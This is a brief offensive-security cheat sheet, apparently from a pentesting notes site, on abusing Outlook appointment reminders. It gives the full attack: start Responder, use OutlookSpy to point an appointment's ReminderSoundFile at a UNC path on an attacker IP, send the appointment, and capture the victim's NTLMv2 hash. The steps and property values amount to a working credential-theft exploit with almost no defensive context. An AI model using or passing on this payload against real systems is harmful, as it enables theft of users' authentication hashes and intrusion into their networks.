Outlook Reminder Privilege Escalation
Exploitation
1. Start Responder
# -I: Interface (eth0, tun0, etc.)
responder -I tun02. Modify Reminder Settings using OutlookSpy
AppointmentItem.ReminderOverrideDefault = true AppointmentItem.ReminderPlaySound = true AppointmentItem.ReminderSoundFile ="\\10.0.0.1\test.wav"
3. Attach New Appointment
4. Capture the Victim’s NTLMv2 Hash with Responder
References
Last updated